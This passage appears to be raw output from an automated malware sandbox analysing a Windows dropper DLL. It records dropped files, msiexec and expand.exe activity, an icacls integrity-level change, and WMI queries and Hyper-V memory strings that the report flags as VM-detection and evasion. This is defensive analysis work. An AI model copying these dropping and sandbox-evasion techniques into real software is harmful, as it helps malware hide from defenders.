        Source: C:\Windows\SysWOW64\msiexec.exeFile written: C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\msiwrapper.iniJump to behavior
        Source: C:\Windows\System32\curl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\curl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\curl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\curl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\curl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\curl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dllStatic PE information: Image base 0x180000000 > 0x60000000
        Source: SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dllStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
        Source: SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: d:\agent\_work\2\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000025.00000003.305737619.00000000049C1000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.345839209.00007FFC23570000.00000002.00000001.01000000.00000009.sdmp, expand.exe, 0000002D.00000003.365492953.00000000051A1000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404566101.00007FFC23C70000.00000002.00000001.01000000.0000000B.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000035.00000003.418909523.0000000003231000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.458293973.00007FFC23C70000.00000002.00000001.01000000.0000000D.sdmp
        Source: Binary string: C:\ss2\Projects\MsiWrapper\MsiCustomActions\Release\MsiCustomActions.pdb source: spclwow78x.msi.10.dr
        Source: 30833088ae6bfb4abc107567083083c9.tmp.37.drStatic PE information: section name: _RDATA
        Source: 29b46379382ed74d83879371e86987c8.tmp.45.drStatic PE information: section name: _RDATA
        Source: fcfd202f570ae346b7d75b811246e386.tmp.53.drStatic PE information: section name: _RDATA
        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI931A.tmpJump to dropped file
        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1F4D.tmpJump to dropped file
        Source: C:\Windows\SysWOW64\expand.exeFile created: C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\files\vcruntime140.dll (copy)Jump to dropped file
        Source: C:\Windows\SysWOW64\expand.exeFile created: C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\files\c52dbbfefebf4f3e88ce36e5881f78eb$dpx$.tmp\67fcf2e8352ef94eab64e4a4d4509680.tmpJump to dropped file
        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI8CB0.tmpJump to dropped file
        Source: C:\Windows\SysWOW64\expand.exeFile created: C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\1305f6fe679b4fa294331bb6eb899bc4$dpx$.tmp\0eae52cd25d2e54183e98bebd14ba490.tmpJump to dropped file
        Source: C:\Windows\SysWOW64\expand.exeFile created: C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\1305f6fe679b4fa294331bb6eb899bc4$dpx$.tmp\30833088ae6bfb4abc107567083083c9.tmpJump to dropped file
        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI24FC.tmpJump to dropped file
        Source: C:\Windows\SysWOW64\expand.exeFile created: C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\files\c52dbbfefebf4f3e88ce36e5881f78eb$dpx$.tmp\fcfd202f570ae346b7d75b811246e386.tmpJump to dropped file
        Source: C:\Windows\SysWOW64\expand.exeFile created: C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\UIServices.exe (copy)Jump to dropped file
        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIECF4.tmpJump to dropped file
        Source: C:\Windows\SysWOW64\expand.exeFile created: C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\UIServices.exe (copy)Jump to dropped file
        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC14D.tmpJump to dropped file
        Source: C:\Windows\SysWOW64\expand.exeFile created: C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\537a39cd2c1b400e9f1169024b13d68d$dpx$.tmp\3439ecd5563108439a8db68236176daf.tmpJump to dropped file
        Source: C:\Windows\SysWOW64\expand.exeFile created: C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\537a39cd2c1b400e9f1169024b13d68d$dpx$.tmp\29b46379382ed74d83879371e86987c8.tmpJump to dropped file
        Source: C:\Windows\SysWOW64\expand.exeFile created: C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\vcruntime140.dll (copy)Jump to dropped file
        Source: C:\Windows\SysWOW64\expand.exeFile created: C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\vcruntime140.dll (copy)Jump to dropped file
        Source: C:\Windows\SysWOW64\expand.exeFile created: C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\files\UIServices.exe (copy)Jump to dropped file
        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI931A.tmpJump to dropped file
        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1F4D.tmpJump to dropped file
        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI8CB0.tmpJump to dropped file
        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI24FC.tmpJump to dropped file
        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIECF4.tmpJump to dropped file
        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC14D.tmpJump to dropped file
        Source: C:\Windows\SysWOW64\expand.exeFile created: C:\Windows\Logs\DPX\setupact.logJump to behavior
        Source: C:\Windows\SysWOW64\expand.exeFile created: C:\Windows\Logs\DPX\setuperr.logJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        barindex
        Source: C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\UIServices.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_CacheMemory
        Source: C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\UIServices.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_CacheMemory
        Source: C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\files\UIServices.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_CacheMemory
        Source: C:\Windows\System32\loaddll64.exe TID: 2092Thread sleep time: -120000s >= -30000sJump to behavior
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI1F4D.tmpJump to dropped file
        Source: C:\Windows\SysWOW64\expand.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\1305f6fe679b4fa294331bb6eb899bc4$dpx$.tmp\30833088ae6bfb4abc107567083083c9.tmpJump to dropped file
        Source: C:\Windows\SysWOW64\expand.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\files\c52dbbfefebf4f3e88ce36e5881f78eb$dpx$.tmp\fcfd202f570ae346b7d75b811246e386.tmpJump to dropped file
        Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIECF4.tmpJump to dropped file
        Source: C:\Windows\SysWOW64\expand.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\537a39cd2c1b400e9f1169024b13d68d$dpx$.tmp\29b46379382ed74d83879371e86987c8.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\UIServices.exeAPI coverage: 3.3 %
        Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\System32\loaddll64.exeThread delayed: delay time: 120000Jump to behavior
        Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: C:\Windows\SysWOW64\expand.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: C:\Windows\SysWOW64\expand.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: C:\Windows\SysWOW64\expand.exeFile Volume queried: C:\ FullSizeInformation
        Source: C:\Windows\SysWOW64\expand.exeFile Volume queried: C:\ FullSizeInformation
        Source: C:\Windows\SysWOW64\expand.exeFile Volume queried: C:\ FullSizeInformation
        Source: C:\Windows\SysWOW64\expand.exeFile Volume queried: C:\ FullSizeInformation
        Source: UIServices.exe, 00000039.00000002.456255231.0000018E5A610000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.437083705.0000018E5A611000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.436830567.0000018E5A611000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.436514987.0000018E5A611000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TLB Flushes Base5344Hyper-V Hypervisor Root Virtual Proce
        Source: UIServices.exe, 00000027.00000003.323791092.0000029C1E26F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: erminated7344Workflows Terminated Per Second7346Workflows Loaded7348Workflows Loaded Per Second7350Workflows Unloaded7352Workflows Unloaded Per Second7354Workflows Suspended7356Workflows Suspended Per Second7358Workflows Idle Per Second7360Average Workflow Load Time7362Average Workflow Load Time Base7364Average Workflow Persist Time7366Average Workflow Persist Time Base8154Terminal Services8156Active Sessions8158Inactive Sessions8160Total Sessions5200Hyper-V Hypervisor Logical Processor5202Global Time5204Total Run Time5206Hypervisor Run Time5208Hardware Interrupts/sec5210Context Switches/sec5212Inter-Processor Interrupts/sec5214Scheduler Interrupts/sec5216Timer Interrupts/sec5218Inter-Processor Interrupts Sent/sec5220Processor Halts/sec5222Monitor Transition Cost5224Context Switch Time5226C1 Transitions/sec5228% C1 Time5230C2 Transitions/sec5232% C2 Time5234C3 Transitions/sec5236% C3 Time5238Frequency5240% of Max Frequency5242Parking Status5244Processor State Flags5246Root Vp Index5248Idle Sequence Number5250Global TSC Count5252Active TSC Count5254Idle Accumulation5256Reference Cycle Count 05258Actual Cycle Count 05260Reference Cycle Count 15262Actual Cycle Count 15264Proximity Domain Id5266Posted Interrupt Notifications/sec5268Guest Run Time5270Idle Time5272% Total Run Time5274% Hypervisor Run Time5276% Guest Run Time5278% Idle Time5280Total Interrupts/sec5182Hyper-V Hypervisor5184Logical Processors5186Partitions5188Total Pages5190Virtual Processors5192Monitored Notifications5194Modern Standby Entries5196Platform Idle Transitions5198HypervisorStartupCost5282Hyper-V Hypervisor Root Partition5284Virtual Processors5286Virtual TLB Pages5288Address Spaces5290Deposited Pages5292GPA Pages5294GPA Space Modifications/sec5296Virtual TLB Flush Entires/sec5298Recommended Virtual TLB Size53004K GPA pages53022M GPA pages53041G GPA pages5306512G GPA pages53084K device pages53102M device pages53121G device pages5314512G device pages5316Attached Devices5318Device Interrupt Mappings5320I/O TLB Flushes/sec5322I/O TLB Flush Cost5324Device Interrupt Errors5326Device DMA Errors5328Device Interrupt Throttle Events5330Skipped Timer Ticks5332Partition Id5334Nested TLB Size5336Recommended Nested TLB Size5338Nested TLB Free List Size5340Nested TLB Trimmed Pages/sec5342I/O TLB Flushes Base5344Hyper-V Hypervisor Root Virtual Processor5346Total Run Time5348Hypervisor Run Time5350Remote Node Run Time5352Normalized Run Time5354Hypercalls/sec5356Hypercalls Cost5358Page Invalidations/sec5360Page Invalidations Cost5362Control Register Accesses/sec5364Control Register Accesses Costm
        Source: UIServices.exe, 0000002F.00000003.400158471.0000027DB50DD000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.392469286.0000027DB7400000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401720587.0000027DB50E0000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.452156375.0000018E5ACFA000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.456053891.0000018E5880C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.455899726.0000018E5878C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.451949537.0000018E5AC7A000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.454503254.0000018E5880C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Dynamic Memory Integration Service
        Source: UIServices.exe, 00000027.00000002.342496999.0000029C1C513000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000003.336526672.0000029C1EAB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Dynamic Memory Integration Service y.a
        Source: UIServices.exe, 0000002F.00000003.400158471.0000027DB50DD000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.392469286.0000027DB7400000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401720587.0000027DB50E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Hyper-V Hypervisorw
        Source: UIServices.exe, 00000039.00000003.452156375.0000018E5ACFA000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.456053891.0000018E5880C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.454503254.0000018E5880C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VHyper-V Virtual Machine Bus Provider Pipesz
        Source: UIServices.exe, 00000039.00000003.452049067.0000018E5AC90000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.455972358.0000018E587A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor)urQ
        Source: UIServices.exe, 00000027.00000003.336480991.0000029C1EA9D000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342452343.0000029C1C4FE000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.451814280.0000018E5AC46000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.455773561.0000018E58758000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DHyper-V Virtual Machine Bus Pipes
        Source: UIServices.exe, 00000039.00000003.451814280.0000018E5AC46000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.455773561.0000018E58758000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DHyper-V Hypervisor Root Partitiono
        Source: UIServices.exe, 0000002F.00000003.390521901.0000027DB7348000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401468831.0000027DB5028000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Virtual Machine Bus Pipes`
        Source: UIServices.exe, 0000002F.00000002.401570207.0000027DB505C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.390667733.0000027DB737C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V umvqqnfqcihjvfn Bus Provider PipesJp
        Source: UIServices.exe, 00000027.00000002.342987817.0000029C1E28F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hannel8260Number of space available signals received8262Number of space available signals received per second8264Number of data available signals received8266Number of data available signals received per second8268Number of space available signals sent8270Number of space available signals sent per second8272Number of data available signals sent8274Number of data available signals sent per second8276Number of data available event was reset8278Number of data available event was reset per second8280Number of space available event was reset8282Number of space available event was reset per second8244RemoteFX Synth3D VSC VM Device8246Number of created VMT channels8248Number of waiting VMT channels8250Number of connected VMT channels8252Number of disconnected VMT channels8254Total number of created VMT channels8256Number of RDVGM restarted notifications7320WorkflowServiceHost 4.0.0.07322Workflows Created7324Workflows Created Per Second7326Workflows Executing7328Workflows Completed7330Workflows Completed Per Second7332Workflows Aborted7334Workflows Aborted Per Second7336Workflows In Memory7338Workflows Persisted7340Workflows Persisted Per Second7342Workflows Terminated7344Workflows Terminated Per Second7346Workflows Loaded7348Workflows Loaded Per Second7350Workflows Unloaded7352Workflows Unloaded Per Second7354Workflows Suspended7356Workflows Suspended Per Second7358Workflows Idle Per Second7360Average Workflow Load Time7362Average Workflow Load Time Base7364Average Workflow Persist Time7366Average Workflow Persist Time Base8154Terminal Services8156Active Sessions8158Inactive Sessions8160Total Sessions5200Hyper-V Hypervisor Logical Processor5202Global Time5204Total Run Time5206Hypervisor Run Time5208Hardware Interrupts/sec5210Context Switches/sec5212Inter-Processor Interrupts/sec5214Scheduler Interrupts/sec5216Timer Interrupts/sec5218Inter-Processor Interrupts Sent/sec5220Processor Halts/sec5222Monitor Transition Cost5224Context Switch Time5226C1 Transitions/sec5228% C1 Time5230C2 Transitions/sec5232% C2 Time5234C3 Transitions/sec5236% C3 Time5238Frequency5240% of Max Frequency5242Parking Status5244Processor State Flags5246Root Vp Index5248Idle Sequence Number5250Global TSC Count5252Active TSC Count5254Idle Accumulation5256Reference Cycle Count 05258Actual Cycle Count 05260Reference Cycle Count 15262Actual Cycle Count 15264Proximity Domain Id5266Posted Interrupt Notifications/sec5268Guest Run Time5270Idle Time5272% Total Run Time5274% Hypervisor Run Time5276% Guest Run Time5278% Idle Time5280Total Interrupts/sec5182Hyper-V Hypervisor5184Logical Processors5186Partitions5188Total Pages5190Virtual Processors5192Monitored Notifications5194Modern Standby Entries5196Platform Idle Transitions5198HypervisorStartupCost5282Hyper-V Hypervisor Root Partition5284Virtual Processors5286Virtual TLB Pages5288Address Spaces5290Deposited Pages5292GPA Pages5294GPA Space Modifications/sec5296Virtual TLB Flush Entires/sec5298Recommended Virtual TLB Size53004K GPA pages53022M
        Source: UIServices.exe, 00000039.00000002.455899726.0000018E5878C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.451949537.0000018E5AC7A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration Service1B
        Source: UIServices.exe, 0000002F.00000003.400158471.0000027DB50DD000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.392469286.0000027DB7400000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401720587.0000027DB50E0000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.452156375.0000018E5ACFA000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.456053891.0000018E5880C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.454503254.0000018E5880C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V umvqqnfqcihjvfn Bus Pipes
        Source: UIServices.exe, 00000039.00000003.452049067.0000018E5AC90000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.455972358.0000018E587A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Dynamic Memory Integration ServiceXulQ
